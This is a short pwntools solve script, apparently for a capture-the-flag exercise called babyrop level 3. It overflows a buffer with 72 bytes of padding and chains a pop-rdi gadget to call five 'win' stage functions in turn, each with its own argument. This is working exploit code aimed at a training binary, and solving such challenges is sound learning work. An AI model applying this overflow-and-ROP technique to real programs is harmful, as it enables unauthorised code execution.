solve script

weiss_overlude/babyrop_level_3.0/a.py

@@ -0,0 +1,32 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+"""
+patchelf --replace-needed libcapstone.so.5 /usr/lib/x86_64-linux-gnu/libcapstone.so.4 babyrop_level_3_0
+"""
+
+context.binary = target = ELF("./babyrop_level_3_0", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# gadgets
+pop_rdi = lambda a: p64(0x402c63) + p64(a)
+
+# buf
+buf = b"A"*72
+buf += pop_rdi(1)
+buf += p64(target.sym.win_stage_1)
+buf += pop_rdi(2)
+buf += p64(target.sym.win_stage_2)
+buf += pop_rdi(3)
+buf += p64(target.sym.win_stage_3)
+buf += pop_rdi(4)
+buf += p64(target.sym.win_stage_4)
+buf += pop_rdi(5)
+buf += p64(target.sym.win_stage_5)
+s(buf)
+
+r.interactive()